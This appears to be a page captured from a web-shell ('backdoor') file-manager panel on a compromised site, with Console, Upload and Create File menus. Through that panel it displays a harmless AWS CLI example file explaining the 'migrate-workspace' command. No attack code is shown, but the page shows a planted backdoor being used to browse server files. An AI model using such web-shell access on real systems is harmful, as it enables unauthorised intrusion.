Website : rimsha.abasa.com
backdoor
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
root
/
lib
/
python3
/
dist-packages
/
awscli
/
examples
/
workspaces
/
Filename :
migrate-workspace.rst
back
Copy
**To migrate a WorkSpace** The following ``migrate-workspace`` example migrates the specified WorkSpace to the ``Standard with Windows 10 (English)`` public bundle type. :: aws workspaces migrate-workspace \ --source-workspace-id ws-12345678 \ --bundle-id wsb-8vbljg4r6 Output:: { "SourceWorkspaceId": "ws-12345678", "TargetWorkspaceId": "ws-87654321" }